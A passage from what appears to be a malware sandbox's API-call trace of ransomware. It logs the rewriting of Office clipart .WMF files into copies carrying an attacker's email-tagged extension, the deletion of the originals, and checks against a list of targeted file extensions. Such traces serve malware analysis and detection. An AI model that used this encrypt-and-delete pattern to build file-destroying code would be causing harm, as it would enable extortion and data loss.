SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.155] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf")) returned 1 [0057.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0057.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0057.156] lstrlenW (lpString=".doc") returned 4 [0057.156] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.156] lstrlenW (lpString=".docx") returned 5 [0057.156] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.156] lstrlenW (lpString=".pdf") returned 4 [0057.156] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.156] lstrlenW (lpString=".xls") returned 4 [0057.156] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.156] lstrlenW (lpString=".xlsx") returned 5 [0057.156] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.156] lstrlenW (lpString=".ppt") returned 4 [0057.156] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0057.156] lstrlenW (lpString=".zip") returned 4 [0057.156] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.156] lstrlenW (lpString=".rar") returned 4 [0057.156] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.156] lstrlenW (lpString=".bz2") returned 4 [0057.156] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.156] lstrlenW (lpString=".7z") returned 3 [0057.156] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0057.156] lstrlenW (lpString=".dbf") returned 4 [0057.156] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0057.157] lstrlenW (lpString=".1cd") returned 4 [0057.157] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0057.157] lstrlenW (lpString=".jpg") returned 4 [0057.157] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.267] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.267] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0057.268] GetLastError () returned 0x0 [0057.268] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xfe2, lpOverlapped=0x0) returned 1 [0057.269] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xff0, lpOverlapped=0x0) returned 1 [0057.270] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.270] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.270] SetEndOfFile (hFile=0x15c) returned 1 [0057.270] CloseHandle (hObject=0x15c) returned 1 [0057.271] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.271] SetEndOfFile (hFile=0x230) returned 1 [0057.271] CloseHandle (hObject=0x230) returned 1 [0057.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf")) returned 1 [0057.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0057.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0057.272] lstrlenW (lpString=".doc") returned 4 [0057.272] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.272] lstrlenW (lpString=".docx") returned 5 [0057.272] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.272] lstrlenW (lpString=".pdf") returned 4 [0057.272] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.272] lstrlenW (lpString=".xls") returned 4 [0057.272] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.272] lstrlenW (lpString=".xlsx") returned 5 [0057.272] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.272] lstrlenW (lpString=".ppt") returned 4 [0057.273] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0057.273] lstrlenW (lpString=".zip") returned 4 [0057.273] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.273] lstrlenW (lpString=".rar") returned 4 [0057.273] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.273] lstrlenW (lpString=".bz2") returned 4 [0057.273] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.273] lstrlenW (lpString=".7z") returned 3 [0057.273] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0057.273] lstrlenW (lpString=".dbf") returned 4 [0057.273] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0057.273] lstrlenW (lpString=".1cd") returned 4 [0057.273] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0057.273] lstrlenW (lpString=".jpg") returned 4 [0057.273] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.273] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.273] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0057.274] GetLastError () returned 0x0 [0057.274] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x5f00, lpOverlapped=0x0) returned 1 [0057.276] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x5f10, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x5f10, lpOverlapped=0x0) returned 1 [0057.277] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.277] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.277] SetEndOfFile (hFile=0x15c) returned 1 [0057.277] CloseHandle (hObject=0x15c) returned 1 [0057.278] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.278] SetEndOfFile (hFile=0x230) returned 1 [0057.278] CloseHandle (hObject=0x230) returned 1 [0057.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.279] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf")) returned 1 [0057.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0057.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0057.280] lstrlenW (lpString=".doc") returned 4 [0057.280] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.280] lstrlenW (lpString=".docx") returned 5 [0057.280] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.280] lstrlenW (lpString=".pdf") returned 4 [0057.280] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.280] lstrlenW (lpString=".xls") returned 4 [0057.280] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.280] lstrlenW (lpString=".xlsx") returned 5 [0057.280] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.280] lstrlenW (lpString=".ppt") returned 4 [0057.280] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0057.280] lstrlenW (lpString=".zip") returned 4 [0057.280] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.280] lstrlenW (lpString=".rar") returned 4 [0057.280] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.280] lstrlenW (lpString=".bz2") returned 4 [0057.280] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.280] lstrlenW (lpString=".7z") returned 3 [0057.280] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0057.280] lstrlenW (lpString=".dbf") returned 4 [0057.280] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0057.281] lstrlenW (lpString=".1cd") returned 4 [0057.281] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0057.281] lstrlenW (lpString=".jpg") returned 4 [0057.281] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.281] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.281] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0057.281] GetLastError () returned 0x0 [0057.281] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x60ca, lpOverlapped=0x0) returned 1 [0057.284] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x60d0, lpOverlapped=0x0) returned 1 [0057.285] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.285] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.285] SetEndOfFile (hFile=0x15c) returned 1 [0057.285] CloseHandle (hObject=0x15c) returned 1 [0057.285] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.285] SetEndOfFile (hFile=0x230) returned 1 [0057.286] CloseHandle (hObject=0x230) returned 1 [0057.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.287] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf")) returned 1 [0057.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0057.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0057.287] lstrlenW (lpString=".doc") returned 4 [0057.287] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.287] lstrlenW (lpString=".docx") returned 5 [0057.287] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.287] lstrlenW (lpString=".pdf") returned 4 [0057.287] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.287] lstrlenW (lpString=".xls") returned 4 [0057.287] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.287] lstrlenW (lpString=".xlsx") returned 5 [0057.287] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.287] lstrlenW (lpString=".ppt") returned 4 [0057.287] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0057.287] lstrlenW (lpString=".zip") returned 4 [0057.287] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.287] lstrlenW (lpString=".rar") returned 4 [0057.287] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.287] lstrlenW (lpString=".bz2") returned 4 [0057.287] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.288] lstrlenW (lpString=".7z") returned 3 [0057.288] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0057.288] lstrlenW (lpString=".dbf") returned 4 [0057.288] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0057.288] lstrlenW (lpString=".1cd") returned 4 [0057.288] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0057.288] lstrlenW (lpString=".jpg") returned 4 [0057.288] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.288] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.288] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0057.288] GetLastError () returned 0x0 [0057.288] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xbb7c, lpOverlapped=0x0) returned 1 [0057.291] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xbb80, lpOverlapped=0x0) returned 1 [0057.292] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.292] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.292] SetEndOfFile (hFile=0x15c) returned 1 [0057.292] CloseHandle (hObject=0x15c) returned 1 [0057.293] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.293] SetEndOfFile (hFile=0x230) returned 1 [0057.293] CloseHandle (hObject=0x230) returned 1 [0057.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.294] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf")) returned 1 [0057.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0057.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0057.294] lstrlenW (lpString=".doc") returned 4 [0057.294] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.294] lstrlenW (lpString=".docx") returned 5 [0057.294] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.294] lstrlenW (lpString=".pdf") returned 4 [0057.294] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.294] lstrlenW (lpString=".xls") returned 4 [0057.294] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.294] lstrlenW (lpString=".xlsx") returned 5 [0057.294] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.294] lstrlenW (lpString=".ppt") returned 4 [0057.294] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0057.294] lstrlenW (lpString=".zip") returned 4 [0057.294] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.294] lstrlenW (lpString=".rar") returned 4 [0057.294] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.294] lstrlenW (lpString=".bz2") returned 4 [0057.294] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.295] lstrlenW (lpString=".7z") returned 3 [0057.295] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0057.295] lstrlenW (lpString=".dbf") returned 4 [0057.295] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0057.295] lstrlenW (lpString=".1cd") returned 4 [0057.295] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0057.295] lstrlenW (lpString=".jpg") returned 4 [0057.295] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.295] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.295] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0057.295] GetLastError () returned 0x0 [0057.295] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x9d0e, lpOverlapped=0x0) returned 1 [0057.298] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x9d10, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x9d10, lpOverlapped=0x0) returned 1 [0057.299] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.299] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.299] SetEndOfFile (hFile=0x15c) returned 1 [0057.299] CloseHandle (hObject=0x15c) returned 1 [0057.300] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.300] SetEndOfFile (hFile=0x230) returned 1 [0057.301] CloseHandle (hObject=0x230) returned 1 [0057.301] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.301] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf")) returned 1 [0057.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0057.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0057.301] lstrlenW (lpString=".doc") returned 4 [0057.301] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.301] lstrlenW (lpString=".docx") returned 5 [0057.301] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.301] lstrlenW (lpString=".pdf") returned 4 [0057.301] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.301] lstrlenW (lpString=".xls") returned 4 [0057.301] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.301] lstrlenW (lpString=".xlsx") returned 5 [0057.301] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.301] lstrlenW (lpString=".ppt") returned 4 [0057.301] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0057.302] lstrlenW (lpString=".zip") returned 4 [0057.302] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.302] lstrlenW (lpString=".rar") returned 4 [0057.302] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.302] lstrlenW (lpString=".bz2") returned 4 [0057.302] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.302] lstrlenW (lpString=".7z") returned 3 [0057.302] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0057.302] lstrlenW (lpString=".dbf") returned 4 [0057.302] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0057.302] lstrlenW (lpString=".1cd") returned 4 [0057.302] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.302] lstrlenW (lpString="C:\\Program Files\\Microsoft 